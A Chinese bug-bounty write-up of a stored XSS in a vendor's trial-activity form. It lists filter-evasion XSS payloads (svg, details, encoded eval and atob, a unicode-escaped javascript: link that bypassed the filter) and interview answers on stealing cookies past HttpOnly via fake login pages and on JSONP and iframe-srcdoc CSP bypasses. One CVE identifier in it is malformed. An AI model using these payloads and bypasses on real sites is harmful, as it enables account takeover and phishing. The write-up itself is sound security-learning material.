限时投稿-记一次补天专属SRC中危漏洞实战

前言

犹记某位师傅所说，有活动的地方就有可能出现漏洞，毕竟是新的业务点，本次漏洞也是与厂商搞的活动有关

记实

经过信息收集，发现其推出了众测活动，类似于0元试用，这无伤大雅，但其中的众测计划属实耐人寻味，因为我输入了<h1>加油</h1>以后，它返回给我的结果如下图所示

这说明填写众测计划时，是可以执行html语句的，这里可以尝试的操作是构造钓鱼链接，比如<a href="https://bbs.zkaq.cn/">我很来劲</a>

那试试能不能执行js呢，成立了就收获存储xss一枚

经初步测试发现，普通的弹窗对它来说是不起作用的

开始fuzz

利用拼接函数

<svg onload="a(this);function a(){}(alert`1`)">
<details ontoggle=this['ale'+'rt']`1` open>
<audio src/onerror=self['pro'+'mpt'](1)>
<img/src=1 onerror=window.alert(1)>

拦截

尝试不同属性

<form action=javascript:alert(1)><input type=submit>
<object data=javascript:alert(1)>

拦截

尝试不同标签

<body onload=alert(1)>
<marquee onstart=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<form onsubmit=alert(1)><input type=submit>

拦截

蟹不肉

编码

<details open ontoggle=eval('%61%6c%65%72%74%28%31%29') >
<details open ontoggle=eval(atob('YWxlcnQoMSk='))>
<img/src=1 onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">
< a href="javascript:al\u{65}rt(6)">XSS Test</ a>

最终，unicode编码成功绕过防护，网费拿下

后记

12期小老弟找工作中，本篇正好又聊到了xss，咱就扯几道面试题（总群里的）吧，同学们有更好的思路不妨一起学习交流

Q1：如何绕过http-only？
A1：首先谈谈http-only，它的作用仅仅是为了避免攻击者获得cookie信息，插还是能插的。再看如何绕过，可以说说风哥提到的这两点 -- csrf、借助phpinfo()让页面显示cookie。除此之外，还可以劫持钓鱼绕过，利用姿势为管理员触发xss后，当前页面即刻跳转至登陆界面，若管理员稍不留意填写了账号和密码，不就拿下了，为啥，因为登陆界面是伪造的。还有没有啥绕过方式，有啊，比如CVE-2012-005，只要攻击者向目标站点植入超大cookie，使得http头超过apache的最大请求长度，apache便会返回400状态码，以及被http-only保护的cookie
Q2：谈一谈csp安全策略，以及如何绕过？
A2：csp即为HTTP Header中的Content-Security-Policy，它存在的目的主要是通过白名单的方式告诉浏览器允许加载和不允许加载的资源。具体用法可以使用script-src，让浏览器只能加载指定规则下的js代码，其他的都一律拒绝。接着讲讲咋个绕过，姿势1 -- jsonp绕过，啥是jsonp，它首先基于json格式，存在的目的在于解决跨域请求资源，而它的原理则是动态地插入带有跨域url的script标签，然后调用回调函数，将用户所需的json数据作为参数传入，通过一些逻辑把数据显示在页面上，说到这儿，自然是明白如何通过它绕过csp了，还不是因为它允许不安全的回调方法，从而给攻击者执行xss创造了机会？直接callback=alert`1`就完事儿了。姿势2 -- 利用iframe的srcdoc属性绕过csp，但有前提，那就是应用得允许加载来自白名单域的iframe，满足了这个前提就可以插了，咋插？用手插

白白